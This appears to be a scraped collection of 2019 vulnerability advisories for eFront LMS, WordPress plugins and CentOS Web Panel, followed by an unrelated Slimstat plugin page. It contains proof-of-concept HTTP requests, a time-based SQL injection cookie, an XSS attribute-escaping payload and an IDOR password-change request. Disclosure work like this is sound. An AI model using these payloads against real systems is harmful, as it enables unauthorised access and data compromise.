A code execution vulnerability exists in Epignosis eFront LMS v5.2.12. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

**Summary**

A code execution vulnerability exists in Epignosis eFront LMS v5.2.12. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

**Tested Versions**

Epignosis eFront LMS v5.2.12

**Product URLs**

https://www.efrontlearning.com/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-502 - Deserialization of Untrusted Data

**Details**

Cisco Talos discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.

The following proof of concept demonstrates the issue:

    POST /audiences/add/1 HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[IP]/audiences/add/1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 168
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=aaaaaaaa;
    Upgrade-Insecure-Requests: 1
    
    ratio=undefined&_qf__audience_properties_form=&qfS_csrf=abc&name=[UNSERIALIZED DATA]&description=jh&active=1&branches_ID=&submit=Add
    

The following code is responsible for all observed unsafe unserializations:

    205     public function set($property, $value, $type = null) {
    206         // $this->$property translates to the variable name, for example $this->_name or $this->_address:
    207         if ($value !== $this->$property) {
    208             // The default type to check against is 'generic', which cuts off non-scalar values:
    209             !empty($type) OR $type = 'generic';
    210
    211             if (!empty($value) && BaseModel::checkParameter($value, $type) === false) {
    212                 throw new EfrontException("Invalid type '{$type}' for '{$property}'");
    213             }
    214
    215             if ($value && $type == 'generic' && @unserialize($value) === false) {
    216                 $value = htmlspecialchars(strip_tags($value), ENT_COMPAT, 'UTF-8',false);
    217             } else if ($value && $type == 'wysiwig') {
    218                 $value = TemplateController::purify($value);
    219             }
    220
    221             $this->$property = $value;
    222             $this->_must_persist = true;
    223         }
    224
    225         return $this;
    226     }
    

Forms submitted to the following URLs were discovered to be vulnerable:

    http://[IP]/Banners/add/1 [name parameter]
    http://[IP]/Glossary/add/1 [term parameter]
    http://[IP]/RandomDataPopulator/add/1 [name parameter]
    http://[IP]/audiences/add/1 [name parameter]
    http://[IP]/branches/add/1 [name parameter]
    http://[IP]/categories/add/1 [name parameter]
    http://[IP]/certificates/add/1 [name parameter]
    http://[IP]/curriculums/add/1 [name parameter]
    http://[IP]/discussions/course-id/180/add-topic/1/popup/1 [title parameter]
    http://[IP]/jobs/add/1 [name parameter]
    http://[IP]/payments/op/price_tracks/add/1 [discount_type parameter]
    http://[IP]/reports/op/courses [filter_name parameter]
    http://[IP]/skill-tests/add/1/quick-add/1 [name parameter]
    http://[IP]/skills/add/1 [name parameter]
    

**Timeline**

2019-07-29 - Vendor disclosure  
2019-07-31 - Vendor acknowledged issues under review  
2019-08-13 - Vendor acknowledged work to fix issues & testing  
2019-08-30 - Vendor patched/released new version  
2019-09-03 - Public disclosure

CVE-2019-5069: TALOS-2019-0858 || Cisco Talos Intelligence Group

An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

**Summary**

An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

**Tested Versions**

Epignosis eFront LMS v5.2.12

**Product URLs**

https://www.efrontlearning.com/

**CVSSv3 Score**

6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

**CWE**

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**Details**

The following parameters are vulnerable to unauthenticated SQL injection attacks:

PHPSessionID parameter:

    GET / HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=aaaaaaaaa%00'[SQL INJECTION]
    Upgrade-Insecure-Requests: 1
    

PoC:

    GET / HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=bbbbbb%00' AND (SELECT 1 FROM (SELECT(SLEEP(8)))a) AND '1'='1
    Upgrade-Insecure-Requests: 1
    

**Timeline**

2019-07-29 - Vendor disclosure  
2019-07-31 - Vendor acknowledged issues under review  
2019-08-13 - Vendor acknowledged work to fix issues & testing  
2019-08-30 - Vendor patched/released new version  
2019-09-03 - Public disclosure

CVE-2019-5070: TALOS-2019-0859 || Cisco Talos Intelligence Group

The rsvpmaker plugin before 6.2 for WordPress has SQL injection.

CVE-2019-15646: RSVPMaker

The ad-inserter plugin before 2.4.20 for WordPress has path traversal.

CVE-2019-15323: Ad Inserter – Ad Manager & AdSense Ads

The give plugin before 2.4.7 for WordPress has XSS via a donor name.

**Exploitation Level:** Medium / Remote

**DREAD Score:** 6.6

**Vulnerability:** Stored XSS on an administrative page

**Patched Version:** 2.4.7

​​Give is a WordPress plugin which allows users to setup a donation page on a website. It currently has 60k installs.

​​During a recent audit of the plugin, we found a severe vulnerability which allows donors to inject arbitrary code on an administrative page.

​​If you are using a version lower than **2.4.7,** you should update immediately.

> Note: A forced update was pushed by the developers, and all affected users should now be patched and protected against this vulnerability.

​​When creating a donation, all of the arguments are sanitized as text fields, but this method does not take into consideration where the variables are reflected. Thanks to this oversight, a malicious user can still perform an injection on the donors page after making a donation.

​​Due to the reflection point, the injection can only be seen by users with sufficient permissions to see the donors — this means that a malicious script could do a lot of damage while acting as these users.

****​​Timeline****

*   ​​**2019-05-03**: Initial disclosure to Give
*   ​​**2019-05-07**: Partial patch released (2.4.6)
*   ​​**2019-05-10**: Notified vendor of possible bypasses
*   ​​**2019-05-14**: Complete patch released (2.4.7)
*   **2019-05-21**: Patch pushed to all customers via auto-update

****​​Technical Details****

​​When processing a donation, the plugin recursively sanitizes every POSTed variable using the sanitize\_text\_field method.

​​The function handling the donation form

​​The function recursively cleaning text fields

​​Under this plugin, a **Donation** uses multiple data structures:

*   ​​**Donation**, which contains the donation content itself.

*   **Donor**, which contains the data related to the user performing the donation.

​​​​If the user performing the donation is a guest, meaning this is the first donation using this email, a new donor will be created with the provided information.

​​Donor creation

​​Under the admin panel, you can see either one of the two created entities by the donation: The **Donors** and The **Donations**.

​​Both of these pages are tables where we can see, filter, and modify the data. On the Donors table, few custom attributes are added on tags to facilitate the website interactivity. Among these is the _data-name_ attribute, which has the donor name value. As you can see on the donor creation code, this value is the full name of the donor. This attribute is used on two tags: The row tag and the column checkbox input.

​​The code can be found under _class-donor-table.php:_

​​Injection on the table row tag

​​Injection on the column checkbox

​​The name of our user was sanitized using the _sanitize\_text\_field_ method, which performs the following actions per the WordPress documentation:

*   ​​Checks for invalid UTF-8

*   ​​Converts single < characters to entities

*   ​​Strips all tags

*   ​​Removes line breaks, tabs, and extra whitespace

*   ​​Strips octets

​​You might notice it removes the **_tags_**, but it does not mention being safe as **_attribute._** ​​With that in mind, it is possible to escape the _data-name_ attribute and add an event on the input.

​Having the following name:

_Name " onfocus="alert(document.domain)" autofocus="_

gives us the following HTML on the input injection:

_<input class="donor-selector" type="checkbox" name="donor\[\]" value="1"_ 

  _data-name="Name_ **_"_** 

  **_onfocus="alert(document.domain)"_** 

  **_autofocus=""_** _/>_

Using the autofocus attributes will trigger the onfocus event without user interaction, which can execute malicious code.

**Conclusion**

Cross-site scripting (XSS) is a widespread vulnerability that allows an attacker to inject malicious content into a site.

In the case of Stored XSS (as seen with this particular vulnerability), the payload is stored in the site’s database and retrieved with every page request. If left unpatched, it can be very dangerous, as an attacker acting as a donor can obtain complete control of the browser environment.

To protect against this vulnerability, we strongly encourage **Give** users to update to **version 2.4.7** as soon as possible. In the event that you can’t immediately update your plugin, you can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

Antony Garand is Sucuri's Threat Researcher who joined the company in 2019. Antony's main responsibilities include researching vulnerabilities and dissecting malware. His professional experience covers many years of security research and development. When Antony isn't breaking stuff, you might find him at the dog park or learning new skills. Connect with him on Twitter

**Reader Interactions**

CVE-2019-15317: WordPress Plugin Give - Stored XSS for Donors

The cforms2 plugin before 14.6.10 for WordPress has SQL injection.

CVE-2015-9333: cformsII

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.837, CSRF in the forgot password function allows an attacker to change the password for the root account.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Cross Site Scripting
    version             : 0.9.8.837
    Fixed on            : 0.9.8.851
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13476
    

  
**Description**

CVE-2019-13476 (XSS) + CVE-2019-13477 (CSRF) Can change password no need to know current password

  
**Reproduce**

1.  login as normal user

  

2.  Click at Email Accounts under the Email Accounts and click it again like image below

  

3.  Click add "New MailBox"

  

4.  add "New mail" and intercept request (use Burp suite for intercept request)

  

5.  Insert payload at parameter "domain" then click "intercept is on" in burp suite

  

6.  Payload added success (in mail box panel user it's doesn't exist after add payload XSS but in panel admin it's will exist)

Script change password (PoC.php)

  

7.  Login as user root (victim) user : root pass : P@ssw0rd

  

8.  After login we will see the left side tap and click at "Email" then click "Email Accounts" under "Email" like image below

  

9.  We can see payload

  

10.  Click any button such as Change Password, Suspend, Delete after click Payload will be executed.

  

11.  After click it's will be redirect and password has been changed password is "AttackerPassword"

  

12.  try to login with old password "P@ssw0rd" we got login failed (image below)

  

13.  Login as root and new password "AttackerPassword"

  

14.  Login success

**Timeline**

    2019-06-05: Discovered the bug
    2019-06-05: Reported to vendor
    2019-06-05: Vender accepted the vulnerability
    2019-07-17: The vulnerability has been fixed
    2019-08-20: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee
    Nissana Sirijirakal 
    Narin Boonwasanarak

CVE-2019-13477: CentOS-Control-Web-Panel-CVE/CVE-2019-13477.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to discover phpMyAdmin passwords (of any user in /etc/passwd) via an attacker account.

    Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin passwordDate                : 24 Jul 2019Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin BoonwasanarakVendor Homepage     : https://control-webpanel.com/Software Link       : Not available, user panel only available for lastest versionVersion             : 0.9.8.851Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)CVE-Number          : CVE-2019-14246Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md1. Login as attacker (low privilege)2. Go to "Mysql Manager"3. Try to change user password of any record4. Intercept the requestPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM05. Modify the request (parameter "dates") and submitPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

CVE-2019-14246: CentOS-WebPanel.com Control Web Panel (CWP) 0.9.8.851 phpMyAdmin Password Change ≈ Packet Storm

An exploitable Stack Based Buffer Overflow vulnerability exists in the EnumMetaInfo function of Aspose Aspose.Words library, version 18.11.0.0. A specially crafted doc file can cause a stack-based buffer overflow, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger this vulnerability.

CVE-2019-5041: TALOS-2019-0805 || Cisco Talos Intelligence Group

The wp-slimstat plugin before 4.8.1 for WordPress has XSS.

*   Details
*   Reviews
*   Installation
*   Development

Track returning customers and registered users, monitor Javascript events, detect intrusions, analyze email campaigns. Thousands of WordPress sites are already using it.

**Main features**

*   **Real-Time Access Log**: measure server latency, track page events, keep an eye on your bounce rate and much more.
*   **Shortcodes**: display reports in widgets or directly in posts and pages.
*   **GDPR**: fully compliant with the GDPR European law. You can test your website at cookiebot.com.
*   **Filters**: exclude users from statistics collection based on various criteria, including user roles, common robots, IP subnets, admin pages, country, etc.
*   **Export to Excel**: download your reports as CSV files, generate user heatmaps or get daily emails right in your mailbox (via premium add-ons).
*   **Cache**: compatible with W3 Total Cache, WP SuperCache, CloudFlare and most caching plugins.
*   **Privacy**: hash IP addresses to protect your users’ privacy.
*   **Geolocation**: identify your visitors by city and country, browser type and operating system (courtesy of MaxMind and Browscap).
*   **World Map**: see where your visitors are coming from, even on your mobile device (courtesy of amMap).

**Requirements**

*   WordPress 5.0+
*   PHP 7.4+
*   MySQL 5.0.3+
*   At least 5 MB of free web space (240 MB if you plan on using the external libraries for geolocation and browser detection)
*   At least 10 MB of free DB space
*   At least 32 Mb of free PHP memory for the tracker (peak memory usage)

**Please note**

*   If you decide to uninstall Slimstat Analytics, all the stats will be **PERMANENTLY** deleted from your database. Make sure to setup a database backup (wp\_slim\_\*) to avoid losing your data.

1.  In your WordPress admin, go to Plugins > Add New
2.  Search for Slimstat Analytics
3.  Click on **Install Now** next to Slimstat Analytics and then activate the plugin
4.  Make sure your template calls wp_footer() or the equivalent hook somewhere (possibly just before the </body> tag)

An extensive knowledge base is available on our website.

Thanks for this plugin! I really enjoy using the real-time user data. It also helps to find out about 404 errors/links on the site. You are doing great 🙂

I want a real time stats of active users on various pages of my site. But the real time page simply lists the current users and there is a map showing their location. Also, there are setting for date range??? This page could be configured better. Include setting as to what qualifies a active user (such as entered page within the last 15 minutes). Some information presented is useful. Also, stats regarding performance taxing on server would be good. But as it is, I don't think I will keep this over GA4.

Best in-house stats plugin for wordpress I could find and great support. No more sharing my website data with third-parties, like Google Analytics. Highly recommend it.

The plugin has been updated. It downloads and unpacks the GeoLite2 database from Maxmind for WooCommerce website without a hiccup. Thank you for a great tool, essential for planning inventory and blocking gargoyles.

Demasiado brutal, tengo menos de un minuto usándola y ya la amo.

especially since the author renewed the plugin recently. It's got geolocation and browser useragent working. Wonderful

Read all 807 reviews

“Slimstat Analytics” is open source software. The following people have contributed to this plugin.

Contributors

**4.9.3.2**

*   \[Fix\] The filtering issue

**4.9.3.1**

*   \[Fix\] Query issue in UTF-8 slugs

**4.9.3**

*   \[Update\] New logo and icon for the plugin!
*   \[Fix\] Hardened plugin security and sanitization of user input and escaped output

**4.9.2**

*   \[Fix\] Fixed tweak notice errors while activating the plugin in fresh installation
*   \[Update\] Tested up to WordPress v6.1

**4.9.0.1**

*   \[Fix\] Entries in the Top Referring Domains report were pointing to broken links (thank you, s7ech).
*   \[Fix\] The new Browscap Library requires at least PHP 7.4, up from 7.1. (thank you, Daniel Jaraud).

**4.9**

*   \[New\] Browscap Library is now bundled with the main plugin, only definition files are downloaded dynamically.
*   \[New\] Support MaxMind License Key for GeoLite2 database downloads.
*   \[New\] Speedup Browscap version check when repository site is down.
*   \[New\] Delete plugin settings and stats only if explicitly enabled in settings
*   \[Fix\] Addressed a PHP warning of undefined variable when parsing a query string looking for search term keywords (thank you, inndesign).
*   \[Fix\] Fixed SQL error when Events Manager plugin is installed, ‘Posts and Pages’ is enabled, and no events are existing (thank you, lwangamaman.
*   \[Fix\] Starting with 4.9, PHP 7.4+ is required (thank you, stephanie-mitchell.
*   \[Fix\] Opt-Out cookie does not delete slimstat cookie.

**4.8.8.1**

*   \[Update\] The Privacy Mode option under Slimstat > Settings > Tracker now controls the fingerprint collection mechanism as well. If you have this option enabled to comply with European privacy laws, your visitors’ IP addresses will be masked and they won’t be fingerprinted (thank you, Peter).
*   \[Update\] Improved handling of our local DNS cache to store hostnames when the option to convert IP addresses is enabled in the settings.
*   \[Fix\] Redirects from the canonical URL to its corresponding nice permalink were being affected by a new feature introduce in version 4.8.7 (thank you, Brookjnk).
*   \[Fix\] The new tracker was throwing a Javascript error when handling events attached to DOM elements without a proper hierarchy (thank , you pollensteyn).
*   \[Fix\] Tracking downloads using third-party solutions like Download Attachments was not working as expected (thank you, damianomalorzo).
*   \[Fix\] Inverted stacking order of dots on the map so that the most recent pageviews are always on top, when dots are really close to each other.
*   \[Fix\] A warning message was being returned by the function looking for search keywords in the URL (thank you, Ryan).

**4.8.8**

*   \[New\] Implemented new FingerPrintJs2 library in the tracker. Your visitors are now associated with a unique identifier that does not rely on cookies, IP address or other unreliable information. This will allow Slimstat to produce more accurate results in terms of session lenghts, user patterns and much more.
*   \[New\] Added event handler for ‘beforeunload’, which will allow the tracker to better meausure the time spent by your visitors on each page. This will make our upcoming new charts even more accurate.
*   \[Update\] Improved algorithm that scans referrer URLs for search terms, and introduced a new list of search engines. Please help us improve this list by submitting your missing search engine entries.
*   \[Update\] Added title field to Slimstat widgets (thank you, jaroslawistok).
*   \[Update\] Reverted a change to the Top Web Pages report that was now combining URLs with a trailing slash and ones without one into one result. As James pointed out, this is a less accurate measure and hides the fact that people might be accessing the website in different ways.
*   \[Update\] The event tracker now annotates each event with information about the mouse button that was clicked and other useful data.
*   \[Fix\] The Country shortcode was not working as expected because of a change in how we handle localization files.
*   \[Fix\] Renamed slim\_i18n class to avoid conflict with external libraries.

**4.8.7.3**

*   \[New\] Implemented a simple query cache to minimize the number of requests needed to crunch and display the data in the reports.
*   \[Update\] Extended tracker to also record the ‘fragment’ portion of the URL, if available (this feature is only available in Client Mode).
*   \[Update\] Do not show the resource title in Network View mode.
*   \[Fix\] Some reports were not optimized for our Network Analytics add-on (thank you, Peter).
*   \[Fix\] The notice displayed to share the latest news with our users would not disappear even after clicking the X button to close it (thank you, Anton).
*   \[Fix\] The ‘Top Web Pages’ reports was listing duplicate entries.
*   \[Fix\] A regression bug was affecting the Currently Online report, by showing incorrect information for the IP addresses.
*   \[Fix\] After resetting the Customizer view, all reports were being listed twice (thank you, Anton).
*   \[Fix\] A new feature introduced by our Javascript tracker was not working as expected in IE11 (thank you, 51nullacht).

**4.8.7.2**

*   \[Fix\] The new tracker was having problems recording clicks on SVG elements within a link (thank you, pollensteyn).
*   \[Fix\] The event handler is now capable of tracking events on BUTTONs within FORM elements.
*   \[Fix\] Permalinks containing post query strings were not being recorded as expected.

**4.8.7.1**

*   \[Note\] We are in the process of deprecating the two columns _type_ and _event\_description_ in the events table, and consolidating that information in the _notes_ field. Code will be added to Slimstat in a few released to actually drop these columns from the database. If you are using those two columns in your custom code, please feel free to contact our support team to discuss your options and how to update your code using the information collected by the new tracker.
*   \[Fix\] A warning message was being displayed when enabling the opt-out feature with certain versions of PHP.
*   \[Fix\] PHP warning being displayed when trying to update some of the add-ons’ settings.
*   \[Fix\] The new tracker was recording the number of posts on an archive page even when the single article was being displayed.
*   \[Fix\] License keys for premium add-ons were not being saved as expected, due to a side effect of the new security features we implemented in the Settings.

**4.8.7**

*   \[New\] With this update, we are introducing an _updated tracker_ (both server and client-side): a new simplified codebase that gets rid of a few layers of convoluted functions and algorithms accumulated over the years. We have been working on this update for quite a while, and the recent conflict with another plugin discovered by some users convinced us to make this our top priority. Even though we have tested our new code using a variety of scenarios, you can understand how it would be impossible to cover all the possible environments available out there. Make sure to clear your caches (local, Cloudflare, WP plugins, etc), to allow Slimstat to append the new tracking script to your pages. Also, if you are using Slimstat to track _external_ pages (outside of your WP install), please make sure to update the code you’re using on those pages with the new one you can find in Slimstat > Settings > Tracker > External Pages.
*   \[New\] Increased minimum WordPress requirements to version 4.9, given that we are now using some more modern functions to enqueue the tracker and implement the customizer feature.
*   \[Update\] We tweaked the SQL query to retrieve ‘recent’ results, and added a GROUP BY clause to remove duplicates. This might affect some custom reports you might have created, so please don’t hesitate to contact us if you have any question or experience any issues.
*   \[Update\] The columns to store event type and description are being deprecated, and consolidated into the existing ‘notes’ column. Our function ss_track() will only accept the note parameter moving forward. Please update your custom code accordingly. In a few releases, we are going to drop those columns from the database.
*   \[Update\] Changed wording on Traffic Sources report to explain what kind of search engine result pages are being counted (thank you, Nina).
*   \[Fix\] The button to delete all the records from the database was not working as expected (thank you, Softfully).
*   \[Fix\] When the plugin was network activated on a group of existing blogs, the tables used to store all the records were not initialized as expected, under given circumstances.
*   \[Fix\] A bug was affecting certain shortcodes when PHP 7.2 was enabled (thank you, Peter).
*   \[Fix\] Emptying one of the settings and saving did not produce the desired effect.

Tag

#php